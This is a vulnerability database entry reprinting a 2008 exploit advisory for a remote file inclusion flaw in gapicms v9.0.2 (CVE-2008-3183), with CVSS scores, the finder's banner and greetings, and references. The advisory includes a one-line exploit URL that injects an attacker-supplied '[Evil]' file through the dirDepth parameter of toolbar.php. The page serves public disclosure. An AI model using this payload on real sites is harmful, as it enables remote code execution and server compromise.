gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability

2008-07-10 / 2008-07-11

Credit: Ghost hacker

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-3183

CWE: CWE-94

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

######################################################################################################
gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability
######################################################################################################
[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,|
[~] HOME : www.Real-Hack.net | )(_o/ \o_)( |
[~] Email : Ghost-r00t_at_Hotmail&#46;com |/ /\ \|
[~] Script : gapicms v9.0.2
[~] Download Script : http://heanet.dl.sourceforge.net/sourceforge/gapicms/gapicms_v9.0.2stable.tar.gz
############################# [ I love the Messenger of Allah Mohammad ] #############################
[~] Error ( ktmlpro/includes/ktedit/toolbar.php )
[~] Exploit :
http://xxxx/[path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil]
############################# [ I love the Messenger of Allah Mohammad ] ############################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ]
All Member Real Hack And All My Friends ..
######################################################################################################
Real Hack Team ( R-H ) ..
######################################################################################################

References:

http://www.securityfocus.com/archive/1/archive/1/494138/100/0/threaded

http://www.milw0rm.com/exploits/6036

http://www.frsirt.com/english/advisories/2008/2059/references

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.